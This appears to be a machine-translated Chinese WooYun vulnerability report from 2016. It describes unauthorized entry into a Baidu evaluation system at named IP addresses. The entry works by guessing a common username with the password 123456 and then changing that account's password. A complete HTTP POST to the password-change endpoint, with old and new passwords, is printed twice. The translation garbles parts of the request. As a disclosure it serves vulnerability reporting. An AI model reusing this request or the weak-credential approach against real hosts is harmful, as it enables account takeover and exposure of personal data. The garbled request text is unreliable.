漏洞标题 看看我如何进入百度的外部系统 相关制造商 百度 漏洞作者 ZOWIE 提交时间 2016-05-11 13: 32 公共时间 2016-06-25 14: 30 漏洞类型 设计缺陷/逻辑错误 危险等级 低 自我评估等级 1 漏洞状态 制造商已确认 标签标签 设计缺陷/边界旁路 漏洞详细信息 百度评估系统 http://180.76.183.98/ 我之前做了一个修改,我改变了姿势再去了。
登录做前端加密,但没有用,然后检索密码,使用常用用户名加弱密码123456直接连接更改密码
我想重置知更鸟帐户并考虑一下。 POST /sys/organization/sys_org_person/chgPersonInfo.do?method=saveMyPwd&s_ajax=true HTTP/1.1 主机: 180.76.183.131 内容长度: 74 接受: application/json,text/javascript,*/*; Q=0.01 原点:http://180.76.183.131 X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,类似Gecko)Chrome/50.0.2661.94 Safari/537.36 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://180.76.183.131/sys/common/changePwd/change_pwd.jsp Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh; q=0.8 Cookie: XXX fdOldPassword=123456&安培;!fdNewPassword=Wooyun123和放大器; fdConfirmPassword=Wooyun123! 进入后,我发现它是一个评估系统,介绍了什么样的百度系统。
还有一些个人信息
好的,午休时间,回到午休时间,地图的其余部分将不会上传。 漏洞证明: 百度评估系统 http://180.76.183.98/ 我之前做了一个修改,我改变了姿势再去了。
登录做前端加密,但没有用,然后检索密码,使用常用用户名加弱密码123456直接连接更改密码
POST /sys/organization/sys_org_person/chgPersonInfo.do?method=saveMyPwd&s_ajax=true HTTP/1.1 主机: 180.76.183.131 内容长度: 74 接受: application/json,text/javascript,*/*; Q=0.01 原点:http://180.76.183.131 X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,类似Gecko)Chrome/50.0.2661.94 Safari/537.36 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://180.76.183.131/sys/common/changePwd/change_pwd.jsp Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh; q=0.8 Cookie: XXX fdOldPassword=123456&安培;!fdNewPassword=Wooyun123和放大器; fdConfirmPassword=Wooyun123! 进入后,我发现它是一个评估系统,介绍了什么样的百度系统。
还有一些个人信息
好的,午休时间,回到午休时间,地图的其余部分将不会上传。 修理计划: 嗯,你知道 版权声明:请注明出处zowie @乌云